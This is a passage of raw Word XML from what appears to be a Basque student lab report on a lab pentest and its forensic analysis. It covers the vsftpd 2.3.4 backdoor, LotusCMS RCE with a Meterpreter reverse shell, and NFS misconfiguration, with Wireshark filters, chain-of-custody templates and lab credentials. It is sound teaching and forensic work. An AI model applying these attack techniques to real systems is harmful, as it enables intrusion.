            <w:tcW w:w="241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Web eskaneatzea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="241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2 — Web enum.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="234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Direktorioak eta</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>URLak</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="217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Metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="241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 xml:space="preserve">Exploit </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="241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3+4 — Ustiapena</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2345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RCE + Backdoor</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>exekuzioa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21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sha1sum /</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>CrackStation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="241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Hash Cracking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="241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3b — Kredentzialak</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="234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SHA1 hash-a</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>identifikatu</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>(Admin123)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="217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showmount</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="241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NFS tresna</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="241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5 — NFS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2345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NFS esportazioen</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>enumerazioa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21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mount</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="241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Sistema tresna</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="241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5 — NFS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="234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NFS direktorioa</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>montatu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p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>10. CVE LABURPENA — AURKITUTAKO AHULTASUNAK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411"/>
        <w:gridCol w:w="1865"/>
        <w:gridCol w:w="1206"/>
        <w:gridCol w:w="1468"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410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CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411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Zerbitzua</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1865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Mota</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1206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Portua</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1468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Eragina</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410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CVE-2011-2523</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411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vsftpd 2.3.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1865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Backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="120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21/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="146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Root Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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CVE-2012-1623</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="241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LotusCMS 3.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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RCE / eval()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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80/tcp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Meterpreter</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>(www-data)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410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Konfig. Okerra</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411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NFS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1865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Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="120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2049/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="146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 xml:space="preserve">FS </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Osoa</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>(irakurketa)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="241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LotusCMS Admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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Pasahitz/Hash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>Ahula</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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80/tcp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Admin Panel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p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:widowControl/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Eranskina D Auzitegi analisiaren txantiloiak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>AUZITEGI-ANALISIA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>FORENTSIKA DIGITALA — TXANTILOIAK</w:t>
      </w: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t>Helburua: 192.168.10.22 — Kali Linux 192.168.10.11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Data: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2026-10-02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 xml:space="preserve">Tresna </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>nagusia: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Wireshark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Metodologia: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Gray Box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Taldea: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T3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p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>1. BABESTE TXANTILOIA (Preservation)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Helburua: Ebidentzia digitalak aldatu gabe mantentzea eta haien benetakotasuna ziurtatzea.</w:t>
      </w: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t>1.1 Kasua — Informazio Orokorra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Kasu zenbakia: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AAI-2026-001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Data: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2026-10-02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Lekua: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Laborategia — sare lokala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Biktimaren sistema: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192.168.10.22 (Ubuntu Linux)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Erasotzailearen IP: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192.168.10.11 (Kali Linux)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Taldea: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T3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t>1.2 Zaintza-Katea (Chain of Custody)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Ebidentzia nork, noiz eta nola jaso zuen dokumentatzen du.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Nork sortu zuen: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Erazotzailea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Sorrera data/ordua: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2026/10/02 – 12:45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Jasotze data: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2026-10-02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Jasotze metodoa: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Ikaskidearengandik USB/transferentzia bidez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Gordailua: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Disko gogorra / analisi makinan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t>1.3 Integritate Egiaztapena — Hash Balioak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Fitxategia jaso ondoren hash-a kalkulatu eta gorde da, aldaketarik egon ez dela frogatzeko.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lastRenderedPageBreak/>
              <w:t>MD5 hash-a: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$md5sum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SHA256 hash-a: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$sha256sum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Noiz kalkulatu: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2026-10-02 — jasotze unean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Ondorioa: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Fitxategia bere horretan jaso da, aldaketarik gabe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 xml:space="preserve">[Hash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>komandoen emaitzaren pantaila-argazkia hemen]</w:t>
      </w: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t>1.4 Ebidentzien Inbentarioa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2592"/>
        <w:gridCol w:w="1008"/>
        <w:gridCol w:w="5256"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="504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#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592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Fitxategiaren izena</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1008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Mota</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5256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Deskribapena</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="50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2592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captura.pcapng</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="100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.pcapng</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="525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Sare-trafiko kaptura osoa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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nmap_scan.txt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.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="52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Nmap eskaneatzearen emaitzak</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="50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2592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[pantaila argazkiak]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1008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PNG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="525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 xml:space="preserve">Wireshark </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>ebidentzia bisualak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p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>2. ESKURATZE TXANTILOIA (Acquisition)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Helburua: Ebidentzia digitalak eskuratu eta modu metodikoan katalogatzea.</w:t>
      </w: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t>2.1 Kaptura Metodoa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Tresna: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Wireshark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Kaptura interfazea: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eth0 / eth1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Mota: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Sare-trafiko kaptura pasiboa (sniffing)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Gorde tokia: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/home/kali/captura.pcapng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Fitxategi formatua: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.pcapng (Wireshark formatu natiboa)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t>2.2 Pcapng Fitxategiaren Laburpena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Wireshark-en Statistics → Summary atalean ikus daiteke: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Protokolo nagusiak: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TCP, FTP, HTTP, NFS, ARP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IP iturri nagusia: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192.168.10.11 (Kali — erasotzailea)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IP helburu nagusia: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192.168.10.22 (Ubuntu — biktima)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t>2.3 Integritate Egiaztapena (Bigarren Aldiz)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Analisirako kopia bat egin eta hash-a berriro egiaztatu da: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Kopia fitxategia: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captura_analisi.pcapng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lastRenderedPageBreak/>
              <w:t>MD5 (kopia):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[HASH — babeste fasekoa bezalakoa izan behar du]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Egiaztapenaren emaitza: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✓</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> Hash-ak bat datoz — fitxategia aldatu gabe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p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>3. ANALISI TXANTILOIA (Analysis)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Helburua: Kapturatutako trafikoa Wireshark erabiliz aztertu eta eraso bakoitzaren ebidentziak aurkitu.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tresnak: Wireshark, NetworkMiner</w:t>
      </w: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t>3.1 Nmap — Portu Eskaneatzearen Analisia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Nmap-ek TCP SYN paketeen bidez portuak eskanatzen ditu. Wireshark-en ikus daiteke: SYN + SYN-ACK = portua IREKITA | SYN + RST = portua ITXITA</w:t>
      </w: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Wireshark filtroa — trafiko osoa:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepLines/>
        <w:widowControl/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ip.sr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>c == 192.168.10.11 &amp;&amp; ip.dst == 192.168.10.22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152"/>
        <w:gridCol w:w="1152"/>
        <w:gridCol w:w="4464"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592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Filtroa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1152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Portua</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1152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Egoera</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4464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Zerbitzua / Bertsioa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592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tcp.port == 21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1152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21/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1152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IREKITA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="44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FTP — vsftpd 2.3.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D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tcp.port == 22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22/tcp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IREKITA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SSH — OpenSSH 8.2p1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592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tcp.port == 80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1152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80/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1152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IREKITA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="44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HTTP — Apache 2.4.41</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D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 xml:space="preserve">tcp.port == </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>2049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2049/tcp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IREKITA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NFS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592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tcp.port == 111</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1152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111/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1152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IREKITA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="44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rpcbind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t>3.2 FTP — Login eta Kredentzialen Analisia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FTP protokoloa enkriptatu GABE doa — erabiltzaile-izena eta pasahitza testu arruntean agertzen dira.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Wireshark filtroa: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ftp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USER filtroa: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ftp.request.command == "USER"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PASS filtroa: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ftp.request.command == "PASS"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Ikusitako erabiltzailea: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anonymous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Ikusitako pasahitza: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[PASAHITZA HEMEN — WIRESHARK PCAP]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Zerbitzariaren erantzuna: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230 Login successful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Banner-a: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220 (vsFTPd 2.3.4)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Ondorioa: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Kredentzialen transmisio enkriptatu gabea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lastRenderedPageBreak/>
        <w:t>Follow TCP Stream: pakete bat &gt; eskuin-klik &gt; Follow &gt; TCP Stream Bertan USER eta PASS testu arruntean agertzen dira.</w:t>
      </w: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t>3.3 HTTP — LotusCMS Admin Login Analisia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 xml:space="preserve">HTTP ere enkriptatu GABE doa — admin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>paneleko POST eskaeran kredentzialen transmisioa ikus daiteke.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HTTP trafiko osoa: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http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POST eskaerak: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http.request.method == "POST"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CMS ataleko trafiko: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http.request.uri contains "/cms/"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POST helburua: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/cms/index.php?system=Admin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 xml:space="preserve">Bidalitako </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>erabiltzailea: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administrator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Bidalitako pasahitza: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Admin123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Zerbitzariaren erantzuna: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302 Redirect (login onartua)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p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Nabigatutako URLak (GET eskaerak):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434"/>
        <w:gridCol w:w="4926"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4434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URLa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4926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Deskribapena</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="443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/cms/index.php?page=index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="492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Hasiera orria</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="443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/cms/index.php?system=Blog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="49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Blog orria</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="443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/cms/index.php?system=Admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="492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Admin panela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t>3.4 vsftpd Backdoor — Port 6200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CVE-2011-2523: vsftpd 2.3.4 bertsioak backdoor bat du. 6200 portuan root shell bat irekitzen du enkriptatu gabe.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Wireshark filtroa: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tcp.port == 6200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Konexio norabidea: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192.168.10.11 → 192.168.10.22:6200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Backdoor erantzuna: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192.168.10.22:6200 → 192.168.10.11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Trafikoa enkriptatuta?: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EZ — komandoak testu arruntean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Follow TCP Stream-ean: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whoami → root / id → uid=0(root)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Ondorioa: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Root sarbidea, enkriptatu gabe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t xml:space="preserve">3.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>LotusCMS RCE — Meterpreter Port 4444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Metasploit-ek reverse TCP payload bat erabiltzen du. Biktimak erasotzaileari konektatzen zaio (port 4444).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lastRenderedPageBreak/>
              <w:t>Wireshark filtroa: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tcp.port == 4444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Konexio norabidea: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192.168.10.22 → 192.168.10.11:4444 (alderantziz!)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Trafikoa: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Meterpreter — enkriptatuta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3096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Ondorioa:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6264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Meterpreter sesioa (www-data)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p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>4. ONDORIOAK ETA GOMENDIOAK</w:t>
      </w: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t>4.1 Aurkikuntzen Laburpena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63"/>
        <w:gridCol w:w="1971"/>
        <w:gridCol w:w="1969"/>
        <w:gridCol w:w="2957"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463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Aurkikuntza</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971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Portua</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1969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Protokoloa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2957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b/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Larritasuna</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463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vsftpd 2.3.4 Backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971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21/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1969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FTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2957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KRITIKOA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D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FTP kredentzialen agerian</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="197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21/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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FTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="29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KRITIKOA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463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LotusCMS RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971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80/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1969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HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2957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KRITIKOA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D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HTTP admin login agerian</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
